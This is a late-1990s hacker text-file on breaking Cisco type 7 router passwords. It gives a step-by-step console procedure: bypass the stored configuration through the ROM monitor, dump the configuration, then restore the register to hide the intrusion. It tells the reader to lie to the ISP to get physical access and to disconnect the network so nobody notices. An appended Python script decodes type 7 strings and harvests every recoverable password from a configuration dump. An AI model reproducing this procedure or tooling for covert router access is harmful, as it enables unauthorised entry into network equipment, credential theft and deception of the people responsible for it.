All sorts of clever people have come up with these lovely utilities for converting Cisco passwords into plain text. Here is a handy little resource for those crucial moments when you just simply forgot to bring your Unix box to the party...
What am I saying??? What I really meant was, some criminally insane sociopaths have abused their positions of power/knowledge to subvert the very fabric of society by wantonly spreading their evil lies and dangerous propaganda, corrupting the innocent in droves along the way, causing mass hysteria, chaos, panic in the streets, flood, famine, pestilence, unwanted pregnancies etc. etc...
It falls to me, therefore, to expose their underground activities, for the world to see, because only by learning their devious tricks can we hope to ever get the better of them...
OK. So what are we actually talking about here? Well... A Cisco router is one of those funny black boxes that sits in your server room, and connects you to that Internet thingy. Cisco sell a *lot* of these boxes, and a large percentage of the Internet is made up of them... They turn over getting on for 8 Billion dollars, selling little black boxes, and, since the security of your network is in part (and often completely) dependent on them, they have taken careful steps to ensure that your router is safe from that world of uninvited guests queuing at your netstep... One of the ways they've protected you is by the use of passwords.

It is possible to provide a password to stop any Harry, Dick or Tom from logging into your router and tweaking its configuration... Since this password contains the keys to your netdom, they encrypt it for added security (this is what 'service password-encryption' does, and it is the '7' in 'enable password 7 ...', Cisco's so-called type 7 scheme). Again, since this key is so important, they spent several minutes, possibly even hours, devising an encryption scheme that makes your password completely safe from prying eyes (rather than spending any of those nice dollars on licensing some strong crypto)... What they came up with is not really encryption at all: the two leading digits are an offset into a fixed 53-character key that is the same in every router ever shipped, each byte of the password is XORed with the key from that offset onwards, and the result is written out in hex. Anyone holding the key (and it is everywhere now) reverses it instantly, no guessing required. This encryption scheme is so secure that it was reputedly cracked during a casual conversation over a cup of coffee in a fast-food restaurant, and the algorithm noted down on a napkin. The algorithm is now widely known, and several versions of the cracker have been published. In addition to the cracker itself, you will also need to know how to get the encrypted password out of the Cisco in the first place, and that is what we are going to look at now:

(One caveat before we start: this only applies to 'password 7' entries. An 'enable secret', which shows up in the config as 'enable secret 5 ...', is an MD5 hash and can't be reversed by this trick; you'd have to guess at it. If a secret is set it takes precedence at the enable prompt, so the 'enable password' you recover may not get you in on its own... though people being people, it's quite often the same word.)
As every little schoolthang knows, every good adventure starts with a map/secret message/tunnel/high class hooker/etc., and this is no exception... We have a secret message AND a back door... First we must obtain the secret message - to do this, you'll need to have physical access to the Cisco. The simplest way is to phone your ISP and tell him/her/geek that you are moving some stuff around in the server room, and need to power it off for a bit. Once it's powered off, follow these steps very carefully...

(Note: This procedure, with its 'o/r' command, only works on the old Motorola 68k based Ciscos, i.e. the 2500 series and its relatives (the 2000s, 3000s and the plain 4000). The newer boxes, the 1600s, 1700s, 2600s, 3600s, 4500s/4700s and the 7500s, have a different ROM monitor with a 'rommon N >' prompt and change the register with 'confreg' instead (e.g. 'confreg 0x2142'), and the 7000s come both ways depending on the processor card... if in doubt, read Asmodeous' text on the subject BEFORE trying this).
1. Disconnect the network connection (you wouldn't want your ISPBitch logging in to see what you were up to, now would you...?)
2. Connect your notebook/pc/Cray/aleph to the 'Console' port. This is an RJ45 style connector on the back of your Cisco providing Serial (RS232) data. Don't plug anything else into it! I have blown up perfectly good Ciscos by accidentally plugging ISDN/Network into these (still not sure which - and I can't afford to find out!).
3. Fire up HyperTerm or your favourite comms proggy (at 9600,n,8,1), switch logging on, and power up the Cisco.
You should see it booting up:
System Bootstrap, Version 5.2(5), RELEASE SOFTWARE
Copyright (c) 1986-1994 by cisco Systems
2500 processor with 1024 Kbytes of main memory
Send a BREAK signal (Ctrl-Break in HyperTerm) within the first 60 seconds or so of the boot, and you should see something like:
Abort at 0x10E7EBA (PC)
Followed by a '>' prompt... you are now talking to the ROM monitor, not IOS.
4. type o/r 0x2142
(This sets the configuration register so that the next boot ignores the configuration stored in NVRAM. 0x2102 is the normal value, and we'll put it back later.)
5. type i
(i for initialise, i.e. reboot.)
The system should now boot again, only this time it won't load its normal startup configuration... It will come up with an empty configuration and the 'initial configuration dialog' (setup mode) will start asking questions... Just say 'no' until you get to the 'Router>' prompt (Note: If you find that it still boots up as normal, you probably didn't hit 'Break' fast enough... You have to catch it good and early, before it has copied the stored configuration into RAM).
6. type enable
The 'Router>' prompt should now change to 'Router#' without asking for a password (the running configuration is empty, so there isn't one), and you've rooted your router!
7. type sh conf
This shows the configuration stored in NVRAM, i.e. the one the router normally boots with, rather than the empty running one. You'll now get some pages of configuration... just hit the space bar whenever you get a '--More--' prompt, until you get back to the 'Router#' prompt.
You've now got all the data you need, so we can put the router back how we found it. Whatever you do, DON'T 'write mem' or 'copy run start' while you're in here: the running configuration is empty, and you would overwrite the real one in NVRAM with it (and that is the sort of thing the ISPBitch notices).
8. type conf term
9. type config-register 0x2102
10. type exit
11. disconnect from the Cisco, reconnect the network and power cycle it (switch it off and on, dummy!). The register change only takes effect on the next reload, so after the power cycle it boots its stored configuration as if nothing had happened.
Your log file should now contain a complete dump of the Cisco... simply find the encrypted entries (they will look something like ' enable password 7 14341B180F0B187875212766'), cut and paste them into the cracker, or process them yourself using the programs provided. Enjoy.
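Since the page talks about 'the cracker' without reproducing it, here is the published type 7 algorithm written out in Python. This is an added example written for this edit, not the page's own cracker nor any of the published ones: it decodes and re-encodes 'password 7' strings and walks a captured 'show config' dump pulling out everything it can. The config dump is constructed for the example; the 'enable password 7 14341B180F0B187875212766' line is the one quoted above, the other hex strings were produced with the encoder in the block, and the 'enable secret 5' line is a dummy of the right shape, not a real hash.

```python
import re

# The fixed 53-byte key baked into IOS for 'password 7' strings. It is the
# same in every router, which is why the scheme is reversible by anyone.
XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# 'password 7 <hex>' and 'secret 5 <md5-crypt>' as they appear in a config dump.
TYPE7_RE = re.compile(r"password 7 ([0-9A-Fa-f]{4,})\s*$")
SECRET5_RE = re.compile(r"secret 5 (\$1\$\S+)\s*$")


def decrypt_type7(enc):
    """Reverse a type 7 string: two decimal digits of seed, then hex bytes,
    each XORed with the key byte at position seed+i."""
    if len(enc) < 4 or len(enc) % 2:
        raise ValueError("not a type 7 string: %r" % enc)
    seed = int(enc[:2])            # ValueError if not decimal
    body = bytes.fromhex(enc[2:])  # ValueError if not hex
    # IOS seeds run 00..15 and passwords are short, so the index never wraps
    # in practice; the modulo only keeps odd input in bounds.
    plain = bytes(b ^ XLAT[(seed + i) % len(XLAT)] for i, b in enumerate(body))
    return plain.decode("ascii")


def encrypt_type7(plain, seed=0):
    """The other direction, to show the scheme is just XOR with a known key."""
    if not 0 <= seed <= 15:
        raise ValueError("IOS only uses seeds 00..15")
    data = plain.encode("ascii")
    body = bytes(c ^ XLAT[(seed + i) % len(XLAT)] for i, c in enumerate(data))
    return "%02d%s" % (seed, body.hex().upper())


def harvest(config_text):
    """Walk a 'show config' dump. Returns (line, plaintext) for every
    'password 7' entry, and (line, None) for 'secret 5' entries, which are
    MD5 hashes and cannot be reversed this way."""
    found = []
    for raw in config_text.splitlines():
        line = raw.strip()
        m = TYPE7_RE.search(line)
        if m:
            found.append((line, decrypt_type7(m.group(1))))
            continue
        m = SECRET5_RE.search(line)
        if m:
            found.append((line, None))
    return found


# Constructed sample dump. The 'enable password 7' line is the one quoted on
# this page; the 0507... strings were produced by encrypt_type7("letmein", 5);
# the 'secret 5' value is a dummy of the right shape, not a real hash.
SAMPLE_CONFIG = """\
version 11.2
service password-encryption
hostname Router
enable secret 5 $1$abcd$0123456789abcdefghijkl
enable password 7 14341B180F0B187875212766
username admin password 7 0507031B2C494707
line con 0
 password 7 0507031B2C494707
 login
line vty 0 4
 login
end
"""

if __name__ == "__main__":
    for line, plain in harvest(SAMPLE_CONFIG):
        if plain is None:
            print("%-50s  (MD5 enable secret: not reversible, guess it instead)" % line)
        else:
            print("%-50s  -> %s" % (line, plain))
```

Run it as a script and it prints every recovered password next to the config line it came from, and flags the 'enable secret' as the one thing in the dump this method can't touch. Feed it the log file from the procedure above instead of SAMPLE_CONFIG and it will do the cut-and-paste for you; the only ValueError you should ever see is from a line that merely looks like a type 7 string.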
BobbyRite (b) 1997,8,9, Major Malfunction, All Writes Reversed, all Wrongs degneveR.